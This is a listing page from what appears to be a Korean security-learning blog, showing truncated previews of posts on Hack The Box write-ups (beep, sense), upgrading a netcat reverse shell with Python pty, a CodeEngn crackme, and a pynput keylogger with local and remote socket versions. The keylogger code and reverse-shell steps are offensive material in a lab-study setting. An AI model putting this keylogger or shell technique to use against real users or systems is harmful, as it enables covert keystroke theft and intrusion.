전체 글345 pseudo terminal(import pty) 바인드 쉘과는 다르게 리버스 쉘은 프롬프트가 없다. 만약 사용자로부터 입력을 받아야하는 명령을 수행할 경우 리버스 쉘이 종료된다. python의 pty 모듈을 통해 pseudo terminal을 생성한다. pseudo terminal을 통해 프롬프트를 제공받으며, 쉘을 좀 더 효율적으로 사용한다. import pty pty.spawn("/bin/bash") 1. 창1에서 nc -nlvp 1234로 1234 포트 리스닝 2. 창2에서 python 18650.py로 리버스 쉘 따기(hackthebox beep 문제 참조. searchsploit -m 19650) 3. 창1에서 id, ls같은 명령어 입력하면 보기 어렵게 나오는 것을 알 수 있음 4. 이때 창1에서 python -c 'import pty;pt.. 2021. 9. 5. [**어렵] beep - 롸업 정리 nmap nmap -sC -sV -sT 10.10.10.7 -> 너무 오래 걸린다... 더 상세한 옵션 nmap -sC -sV -p- 10.10.10.7 웹 페이지 나옴 elastix의 default credentials라 나오는 admin / palosanto, admin/ admin, admin / password 먹히지 않는다. [****] 막간 지식 - elastix란? IP PBX, 이메일, IM, 팩스 및 공동 작업 기능을 제공하는 통합 커뮤니케이션 서버 소프트웨어 - pbx란?? 회사에서 사용되는 일정 수의 외부 전화회선을 모든 직원이 공유하고, 내선에 연결되어 있는 내부사용자들간에 전화를 자동으로 연결해주기 위한 전화교환 시스템 - FreePbx란??? 잘 안나오지만.. free하게 pbx.. 2021. 9. 3. [python] __name__ 직접 출력으로 알아보기 내가 판단하기론... prac1.py에서 그냥 __name__을 출력해보거나, 해당 파일 안에서 함수를 만들어 __name__을 찍어봤을 때는 항상 __main__으로 나온다. 하지만 prac1.py안에서 otherfolder 폴더의 prac.py를 호출하면 prac.py의 경로와 파일명이 찍히는 것을 볼 수 있다. 2021. 9. 3. sense - 롸업 정리 https://github.com/rkhal101/Hack-the-Box-OSCP-Preparation/blob/master/linux-boxes/sense-writeup-w-o-metasploit.md GitHub - rkhal101/Hack-the-Box-OSCP-Preparation: Hack-the-Box-OSCP-Preparation Hack-the-Box-OSCP-Preparation. Contribute to rkhal101/Hack-the-Box-OSCP-Preparation development by creating an account on GitHub. github.com nmap -sC -sT -sV 10.10.10.60 -sC: run default nmap scripts -sV: .. 2021. 9. 3. 매우 간단한 python keylogger 만들기 pip install pynput 먼저, local version from pynput.keyboard import Key, Listener import logging log_dir='' logging.basicConfig(filename="logging.txt", level=logging.DEBUG, format='[%(asctime)s", %(message)s]') def on_press(key): logging.info('"{0}"'.format(key)) with Listener(on_press) as l: l.join() remote version server.py import socket import logging logging.basicConfig(filename="logger.txt", l.. 2021. 8. 26. CodeEngn - advance 8 x32dbg로 열었다가 창이 안 켜지길래 머지 페이크인가..? 하고 삽질하다가 그냥 내 x32dbg가 안된다는 것을 깨달았다... ollydbg로 하니까 된다... 로컬(windows 10), vm(windows 10, windows 7) 다 x32dbg로는 창이 안켜졌다. 왜 그런지는 모르겠다. # ollydbg를 사용한다면 관리자로 실행하는 게 좋다. 1. AB 이렇게 두 문자만 넣으면 please.. 뭐시기가 뜸. 이거 우회해야 함. 1-1. 우회방법 문자열로 찾아서 해당 분기문의 CMP EAX,3을 CMP EAX,2로 바꾼다. 2. f8로 하나씩 실행시켜보다가 여기 맨 마지막 줄을 실행시키면 오른쪽 레지스터 값에 key값이 생성된 것을 볼 수 있다. 그렇다면, 그 위의 call 08.0045B85.. 2021. 8. 26. 이전 1 ··· 39 40 41 42 43 44 45 ··· 58 다음
